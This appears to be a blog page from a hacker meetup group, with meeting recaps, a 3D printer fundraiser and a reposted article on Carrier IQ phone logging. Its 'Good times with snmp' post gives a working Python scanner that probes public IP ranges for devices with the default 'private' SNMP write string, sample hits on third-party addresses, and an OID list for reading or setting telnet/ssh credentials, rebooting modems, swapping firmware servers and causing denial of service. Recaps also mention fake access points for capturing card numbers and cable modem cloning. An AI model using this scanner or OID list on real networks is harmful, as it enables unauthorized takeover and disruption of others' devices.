December meeting recap

Ngharo got this started with going around the room and asking everyone what they have been hacking and what they plan on hacking on next, then talking about some improvements to the dc414 server, such as how it is now fully IPv6 friendly and some improvements to the VPN. Then I gave a demo of how BeEF when used with Metasploit can pwn browsers from the inside out. dw5304 stepped in and showed us how to use the windows 7 UI on windows 8 with out having to worry about updates messing things up. Then Noize stepped up and gave us all a great introduction to Subterfuge, a MITM framework that utilizes arp attacks. Then I attempted to give another demo but failed, more on that later šŸ˜‰ We spent the rest of the night drinking, eating cupcakes “thanx darkwinds wife” and loling at horror pics of server rooms and wiring closets. Congrats to Castor, Tony, and Peppergomez for winning the dc414 free junk giveaway!! Enjoy your junk guys šŸ˜›

We got $42 in donations which paid for the pizza and some of the beer with nothing left over for the server :/ which cost about $71 a month. Remember your donations are what keeps dc414 running smoothly for YOU!!!!

September meeting recap

Last meeting was awesome as always, we had some good demos and new faces which is always great. Ngharo started it off going around the room and asking ppl what they hacked last month and what they plan to hack next.

I gave my fakeAP demo to get credit card numbers or sniff traffic. The CC part failed :/ but the sniff part worked like a charm!! Then dw5304 gave a demo titled “Cable hacking for fun” and talked about how to get online anonymously with cable modems, getting almost unlimited bandwidth, modem cloning and lots more. Faraday came packing with some lithium ion batteries and big ass LEDs he gave out “to make flash lights out of” and stuff for making your capacitors which is always fun.

Then I spent the rest of the night drinking beer and yelling in to a ham radio, so I didn’t take any pictures. Congrats to uberushaximus for winning the dc414 free junk giveaway!

Here is a link to the github fakeAP pwnage project, it only works with Backtrack 5 and could use some improvement.
https://github.com/dc414/fakeAP_pwnage

Here is the slides to dw5304’s Cable hacking for fun:
https://skydrive.live.com/redir?resid=463779BB134E309F!375&authkey=!AF56QcP0xP4Ofco

August meeting awesomeness

Klaiviel started us off by giving us a nice show of binary key card hotel locks popular over seas, showed us a 3d printed key for one of his locks, explained pick proof locks from the 40s that are no longer used but highly effective and how to make them today using regular locks. Then he showed us why he is the second best key impressionist in the world, and made a working key for a lock right in front of us and giving us step by step instructions on how to do it our selves.

I stepped in and gave a quick demo of how I made our new and improved donations bucket which I will be making a blog post on later. Darkwind came packing with a alfa wifi antenna hooked up to a satellite dish! This made a killer directional wifi antenna, we took it up to the roof of bucketworks and got signals from all over including the moon šŸ˜› Ngharo hooked it up to his lappy and cracked a few networks šŸ™‚

After the roof party was over and we got back down stairs Castor gave a DEFCON20 badge hacking demo and showed us how to turn our badges into any other badge type we wanted, then showed us how to make the LEDs on the badge flash out words and stuffs. Then we all just started bull shitting and talking about up coming projects.

Cmoney couldnt make it out so I took a few picture that you can view here. Congrats to darkwind and faraday for winning the dc414 free junk giveaway!!

Good times with snmp

At the last meeting dw5304 gave a demo on snmp scanning and gaining access to things you shouldn’t have access to with a few home brew windows apps he coded up. Its been a while since I messed with snmp but his demo got me back into it, so I made a little python script to scan subnets for open snmp servers with the read/write string set to private. Here is the code:

#! /usr/bin/env python
import commands
from scapy.all import *

base = "69.2.1." #IP range to scan minus the last octet.
f = open('/tmp/snmp_output.txt', 'w+')
for i in range(1, 255):
ip = base+str(i)
print ip+"\n"
p = IP(dst=ip)/UDP(dport=161, sport=39445)/SNMP(community="private",PDU=SNMPget(id=1416992799, varbindlist=[SNMPvarbind(oid=ASN1_OID("1.3.6.1.2.1.1.1.0"))]))
pkt = sr1(p, timeout=1)
if pkt and pkt.sprintf("%IP.proto%") != "icmp":
p1 = pkt.sprintf("%SNMP.PDU%").split("ASN1_STRING['", 1)
p2 = p1[1].split("'", 1)
print pkt.sprintf("%IP.src%")+" - "+p2[0]
f.write(pkt.sprintf("%IP.src%")+" - "+p2[0]+"\n")
f.close()
print "\nDONE!!!!!!!!!!!!!!!\n"

Its a little hacked together and could use improvement but it works “feel free to send in any improvements you make”. It puts all the found servers IPs in /tmp/snmp_output.txt along with their system description enumerated via snmp. Here is a sample output:

69.1.117.87 - Ruckus Wireless Inc (C) 2006
69.1.117.156 - Ruckus Wireless Inc (C) 2006
69.1.117.190 - Ruckus Wireless Inc (C) 2006
69.1.117.193 - Ruckus Wireless Inc (C) 2006
69.1.117.203 - Ruckus Wireless Inc (C) 2006
69.1.117.221 - Ruckus Wireless Inc (C) 2006
69.1.163.92 - 24-port 10/100 + 2-Port Gigabit Switch with WebView and PoE
69.1.163.93 - Product: GW 4 FXS;SW Version: 5.80A.023.006

Once you find a few servers you can do snmpwalks on them and scour it for juicy info.
Here are some good OIDs to look for and/or set: *found most of this online & got some from dw5304

ip.ipForwarding.0 <-this tells you if its forwarding packets or not "useful to DoS a device" 1.3.6.1.2.1.4.24.2.1.1 <-ipforwardingdest sysName.0 <-device name 1.3.6.1.4.1.4413.2.2.2.1.1.1.4.0 i 1 ... EnableTelnetServer. 1.3.6.1.4.1.4413.2.2.2.1.1.1.1.0....telnetIpStackInterfaces. 1.3.6.1.4.1.4413.2.2.2.1.1.1.2.0....telnetUserName.. 1.3.6.1.4.1.4413.2.2.2.1.1.1.3.0....telnetPassword.. 1.3.6.1.4.1.4413.2.2.2.1.1.1.4.0....telnetServerControl. 1.3.6.1.4.1.4413.2.2.2.1.1.1.5.0....telnetSessionIp. 1.3.6.1.4.1.4413.2.2.2.1.1.1.6.0....telnetSessionInProgress. 1.3.6.1.4.1.4413.2.2.2.1.1.1.7.0....telnetForceUserLogout. 1.3.6.1.2.1.1.1.0 = System Description 1.3.6.1.2.1.1.3.0 = Modem up time 1.3.6.1.2.1.4 = Some useful information (walk) 1.3.6.1.2.1.4.20.1.1.0 = HFC IP (getnext) 1.3.6.1.2.1.4.20.1.3.0 = HFC Subnet (getnext) 1.3.6.1.2.1.2.2.1.6.2= Mac 1.3.6.1.2.1.10.127.1.1.3.1.3.1 = Maximum upload bandwidth 1.3.6.1.2.1.10.127.1.1.3.1.5.1 = Maximum download bandwidth 1.3.6.1.2.1.10.127.1.1.4.1 = Current status (walk) 1.3.6.1.2.1.17.4.3.1.1.0 = Hosts behind modem 1.3.6.1.2.1.69.1.4.4.0 = TFTP Configuration file server IP 1.3.6.1.2.1.69.1.4.5.0 = Configuration file name 1.3.6.1.2.1.69.1.3.5.0 = Current firmware 1.3.6.1.2.1.69.1.4.2.0 = DHCP Server IP 1.3.6.1.2.1.69.1.4.3.0 = Time Server IP 1.3.6.1.2.1.69.1.5.8.1.7 = View Log (walk) 1.3.6.1.2.1.10.127.1.1.1.1.2.3 = Downstream Frequency 1.3.6.1.2.1.69.1.4.5.0 = Image File 1.3.6.1.2.1.17.4.3.1.1 = Learned MAC (Get Next) ---[ Read / Write OIDs 1.3.6.1.2.1.69.1.1.3.0 = Boot modem (1=boot now) 1.3.6.1.2.1.69.1.3.1.0 = TFTP Firmware server IP 1.3.6.1.2.1.69.1.3.2.0 = Firmware filename 1.3.6.1.2.1.69.1.3.3.0 = Firmware update status (1=update now, 2=update on boot,3=disable updates) 1.3.6.1.2.1.69.1.5.2.0 = SNMP Traps server IP (0.0.0.0 = disabled) 1.3.6.1.2.1.69.1.5.3.0 = SNMP Traps status (1=enabled, 4=disabled) 1.3.6.1.4.1.1166.1.19.3.1.14.0 = SNMP Port 1.3.6.1.4.1.1166.1.19.3.1.15.0 = SNMP Traps port 1.3.6.1.4.1.1166.1.19.3.1.17.0 = HTML Server status (1=enabled, 2=disabled)Other OIDs 1.3.6.1.2.1.1.5.0 = modem type 1.3.6.1.3.83.1.1.4.0 = Cable Modem Serial Number 1.3.6.1.3.83.1.4.5.0 = Alternate OID for Config File 1.3.6.1.3.83.1.4.3.0 = Provisional Server 1.3.6.1.2.1.1.6.0 = Area String 1.3.6.1.2.1.4.20.1.3+(hfc ip) = Subnet Example 1.3.6.1.2.4.20.1.3.10.169.53.2451.3.6.1.3.103.1.5.1.3.1.5 = CPE USB MAC 1.3.6.1.2.1.2.2.1.6.1 = Cable Modem USB MAC 1.3.1.6.1.2.1.10.127.1.2.1.1.1.2 = Default Gateway MAC Address 1.3.6.1.2.1.2.10.127.1.1.3.1.6.1 = Max Burst Up 1.3.6.1.2.1.2.2.1.6.5 = CPE MAC 1.3.6.1.4.1.1166.1.19.3.1.17.0Ii 1 or 0 enable or disable webif 1.3.6.1.4.1.4413.2.2.2.1.1.4.1 =ā€reflects the IP stack interfaces on which a ssh 1.3.6.1.4.1.4413.2.2.2.1.1.4.2 = "reflects the user name which will be allowed ssh access." 1.3.6.1.4.1.4413.2.2.2.1.1.4.3 = "reflects the password which will be allowed ssh access." 1.3.6.1.4.1.4413.2.2.2.1.1.4.4 = "start or stop the ssh server. 1.3.6.1.4.1.4413.2.2.2.1.1.4.7 =terminate ssh session

You can find a lot more online. Enjoy and happy hacking šŸ™‚

3D Printer Fund

There has been a lot of buzz about 3D printers over the last year. Ā Prices are coming down and resolution has been increasing. Ā Klaiviel, our resident lockpicking guru, is attempting to start a business around it. Ā We feel that DC414 as a whole needs their hands on this technology. Ā We’re starting a 3D printer fund starting now.

There are many options to go with but we want to get the ball rolling while research is happening inĀ parallel. Ā Price range we’re looking at is between $500 and $1,000 for quality printers.

This won’t happen without help from people like you. Ā  Once purchases / assembled / hacked, our goal is to make the printer accept jobs from online. We’d queue up jobs and have a webcam feed to view progress when printing remotely. Ā  Notifications would be sent out to the author upon start, completion, and possibly other metrics we can get out of the printer.

  • Donate $25+ gets you free stickers
  • Donate $50+ gets you a free shirt
  • Donate $100+ gets you free prints for 6 months
  • Donate $150+ gets you free prints and priority for 6 months

Any size donation gets you on the thank you list.

As of now we have $233 in the fund. Ā Make your donation now (look to the right) and lets get this ball rolling.

June meeting recap

June’s meeting was great! More new faces, lots of beer, and plenty of pizza šŸ™‚ Ngharo got things started by making a few announcements like our new VPN that is available for donating members, and asking everyone what they are hacking ATM and what they wanna hack next. I was up next and talked about the new server and some of the sections of the site. Then Ulic gave us all the 411 on the Flamer virus sweeping the middle east and some of its unique features. dw5304 took over and gave a sweet demo on how to hack/mod the xbox360, complete with code and points of solder. We got some great pictures this time thanx to cmoney which you can view here. Congrats to nikto, Tony, and Ulic for winning the dc414 free junk giveaway.

Here is nikto and his dc414 junk šŸ™‚

May meeting recap.

May’s meeting was off the hook, one of our best yet! Lots of new faces which is always nice, good demos, and good beer. Ngharo started it off by talking about the hackathon and THOTCON. Klaiviel did his lock master thing and said a few words about TOOOL. Darkwind gave a awesome demo on sniffing pagers. Its crazy to see all the pager traffic that is still out there. Then I showed off my Arduino windows attack tool and pwned a windows 7 box, There will a blog post about that later. Congrats to Genero for winning the dc414 free junk giveaway! I did take a bunch of pictures but my phone was full of fail and didn’t save any of them šŸ™ so no pictures of the meeting this time, sorry. I promise to do better next time šŸ˜› later.

THOTCON greatness

This was the best THOTCON I have been to yet! Awesome talks, awesome beer, awesome food, and awesome people kinda sums it up for this year. Mine and ngharo’s talk went really well, and so far I have had lots of good feed back. I was a little drunk by the time we did our talk so that helped a lot, lol. My favorite talk was “Owning Payphones: 3650-Day Exploits” from savant, dude did a wonderful job and violated payphones in dirty ways! The one I learned the most from was “You put what in your DNS record?” from Mubix, yeah zone transfers are old school and I been using it for ever, but I had no idea you could do it to com and stuff, lol. Here are some pics of the swag and the con. Enjoy.

Me and ngharo giving our talk:

April fun

Aprils meeting wasn’t for fools, it was for hackers šŸ˜› It was another awesome meeting full of beer, pizza, lulz, and hacks. dw5304 got the night rolling with how to bypass windows 7 login password, then went on to talk bout how to pwn Time Warner internet! Then Klaiviel gave us a 101 style schooling on hand cuffs, tumbler, combo, and tubular locks and some others! He also covered some car locks, key impression and stuff. He explained the different picking methods and the tools of the trade. Ngharo and I topped off by giving the talk we have prepared for THOTCON! It went well but it is clear we need a little practice before the big event.

Here are some pictures from the meeting thanx to cmoney. Congrats to Klaiviel for getting so many achievements for the Lock Master badge in one night and to The Professor for winning the dc414 free junk giveaway!! He got a awesome CD/DVD/DVD-R external drive “lol”, enjoy!

Big winner of free dc414 junk šŸ™‚

rootkit hidden in millions of cellphones

Another email just surfaced …

rootkit hidden in millions of cellphones

Rootkit found in Android, Symbian, BlackBerry, webOS and even iOS handsets …. but not windows phone’s

TheĀ rootkitĀ belongs to a company calledĀ Carrier IQĀ and it seems that it has low-level access to the system that allows it to spy on pretty much everything that you do with your handset. This, on the face of it, seems like an extremely serious breach of security, privacy and trust.

The capabilities of the rootkit were first discovered byĀ 25-year-old Trevor Eckhart.

Hereā€™s a video showing how everything, including text messages and encrypted web searches, are being logged. Itā€™s truly horrifying.

NOTE: At this point there is no evidence to suggest that keystroke data is being transmitted from the handset.

According to Carrier IQ the company is ā€˜not recording keystrokes or providing tracking tools.ā€™ The video above seems to suggest otherwise.

When Eckhart initially labeled the software as a rootkit,Ā Carrier IQ threatened him with legal action. Only when theĀ Electronic Frontier Foundation stepped in did the companyĀ back off from this threat.

ā€œEvery button you press in the dialer before you call,ā€ Eckhart says on the video, ā€œit already gets sent off to the IQ application.ā€

Like I said earlier, thereā€™s a version of Carrier IQ on Appleā€™s iOS, but it doesnā€™t seem to be quite the same andĀ doesnā€™t seem toĀ accessĀ as much information. Also, if you want to disable Carrier IQ on your iOS 5 device, turning offĀ Diagnostics and UsageĀ underĀ SettingsĀ seems to be enough.

You might have noticed that I didnā€™t list Windows Phone 7 OS earlier.Ā Thatā€™sĀ becauseĀ it seems that Windows Phone handsets donā€™t have Carrier IQĀ installed.

Hereā€™s a video that explains some more about Carrier IQ. This video also contains a clip from a video by Carrier IQā€™s vice president of marketing explaining how the company sees this as being completely legal.

 

[UPDATE: According to a statement from Apple toĀ AllThingsD, Apple stopped supporting Carrier IQ with iOS 5.0:

ā€œWe stopped supporting Carrier IQ with iOS 5 in most of our products and will remove it completely in a future software update. With any diagnostic data sent to Apple, customers must actively opt-in to share this information, and if they do, the data is sent in an anonymous and encrypted form and does not include any personal information. We never recorded keystrokes, messages or any other personal information for diagnostic data and have no plans to ever do so.ā€

When begs the question … what’s collecting all the information on the iPhone? Is this a mechanism developed by Apple for Apple?]

Bit shocked that yourĀ iPhone has that Carrier IQ logging feature built into the OS? You can switch it off ā€¦ in fact,Ā Iā€™ve shown you how to do this before!

Hereā€™s how!

Buried in theĀ SettingsĀ menu is an option to choose not to send what Apple calls ā€˜diagnostic and usage data.ā€™ This option is buried real deep:

SettingsĀ >Ā GeneralĀ >Ā AboutĀ >Ā Diagnostics & Usage

Hereā€™s the screen youā€™re looking for:

Set this toĀ Donā€™t SendĀ and you can stop worrying about where your data is going and whoā€™s looking at it.

Note that this feature isĀ onlyĀ present on handsets running iOS 5.0 or later (so the iPhone 4S and upgraded iPhone 4 and 3GS handsets.